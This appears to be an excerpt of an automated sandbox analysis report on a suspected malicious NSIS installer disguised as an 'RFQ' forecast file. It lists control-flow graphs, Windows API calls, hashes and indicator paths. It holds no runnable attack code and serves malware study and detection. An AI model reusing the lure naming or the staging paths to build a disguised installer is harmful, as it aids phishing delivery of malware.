                                                                                                            • String ID: "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3586999533-3827748273
                                                                                                            • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                            • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                            • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                            • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                            • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                            • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                            • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 507 4060c4-4060cb 503->507 505 4060d0-4060dd 504->505 506 4062cf-4062da 504->506 505->506 510 4060e3-4060ef 505->510 508 4062e5-4062e6 506->508 509 4062dc-4062e0 call 406055 506->509 507->504 509->508 512 4062b0 510->512 513 4060f5-406131 510->513 514 4062b2-4062bc 512->514 515 4062be-4062c1 512->515 516 406251-406255 513->516 517 406137-406142 GetVersion 513->517 514->504 515->504 518 406257-40625b 516->518 519 40628a-40628e 516->519 520 406144-406148 517->520 521 40615c 517->521 522 40626b-406278 call 406055 518->522 523 40625d-406269 call 405f9c 518->523 525 406290-406298 call 406077 519->525 526 40629d-4062ae lstrlenW 519->526 520->521 527 40614a-40614e 520->527 524 406163-40616a 521->524 538 40627d-406286 522->538 523->538 530 40616c-40616e 524->530 531 40616f-406171 524->531 525->526 526->504 527->521 528 406150-406154 527->528 528->521 534 406156-40615a 528->534 530->531 536 406173-406199 call 405f22 531->536 537 4061ad-4061b0 531->537 534->524 548 406238-40623c 536->548 549 40619f-4061a8 call 406077 536->549 541 4061c0-4061c3 537->541 542 4061b2-4061be GetSystemDirectoryW 537->542 538->526 540 406288 538->540 544 406249-40624f call 4062e9 540->544 546 4061c5-4061d3 GetWindowsDirectoryW 541->546 547 40622e-406230 541->547 545 406232-406236 542->545 544->526 545->544 545->548 546->547 547->545 550 4061d5-4061df 547->550 548->544 555 40623e-406244 lstrcatW 548->555 549->545 552 4061e1-4061e4 550->552 553 4061f9-40620f SHGetSpecialFolderLocation 550->553 552->553 557 4061e6-4061ed 552->557 558 406211-406228 SHGetPathFromIDListW CoTaskMemFree 553->558 559 40622a 553->559 555->544 561 4061f5-4061f7 557->561 558->545 558->559 559->547 561->545 561->553
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-1230650788
                                                                                                            • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                            • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                            • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                            • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 577 4058b1-4058bc lstrcatW 569->577 578 4058be-4058bf call 405a55 569->578 570->567 574 4059b7-4059ba 570->574 571->569 571->570 575 4059c4-4059cc call 406398 574->575 576 4059bc-4059c2 574->576 575->567 586 4059ce-4059e2 call 405a09 call 4057fe 575->586 576->567 580 4058c4-4058c8 577->580 578->580 582 4058d4-4058da lstrcatW 580->582 583 4058ca-4058d2 580->583 585 4058df-4058fb lstrlenW FindFirstFileW 582->585 583->582 583->585 587 405901-405909 585->587 588 4059a5-4059a9 585->588 602 4059e4-4059e7 586->602 603 4059fa-4059fd call 4051b4 586->603 590 405929-40593d call 406055 587->590 591 40590b-405913 587->591 588->570 593 4059ab 588->593 604 405954-40595f call 4057fe 590->604 605 40593f-405947 590->605 594 405915-40591d 591->594 595 405988-405998 FindNextFileW 591->595 593->570 594->590 598 40591f-405927 594->598 595->587 601 40599e-40599f FindClose 595->601 598->590 598->595 601->588 602->576 607 4059e9-4059f8 call 4051b4 call 405ef6 602->607 603->567 613 405980-405983 call 4051b4 604->613 614 405961-405964 604->614 605->595 608 405949-405952 call 405846 605->608 607->567 608->595 613->595 617 405966-405976 call 4051b4 call 405ef6 614->617 618 405978-40597e 614->618 617->595 618->595
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 0040586F
                                                                                                            • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 004058B7
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 004058DA
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 004058E0
                                                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"), ref: 004058F0
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                            • \*.*, xrefs: 004058B1
                                                                                                            • "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe", xrefs: 0040584F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-750507425
                                                                                                            • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                            • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                            • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                            • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans, xrefs: 00402154
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Khans
                                                                                                            • API String ID: 542301482-1138960293
                                                                                                            • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                            • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                            • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                            • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                            • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                            • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                            • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                            • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                            • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                            • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                            • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                            • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                            • DestroyWindow.USER32 ref: 00403CAE
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
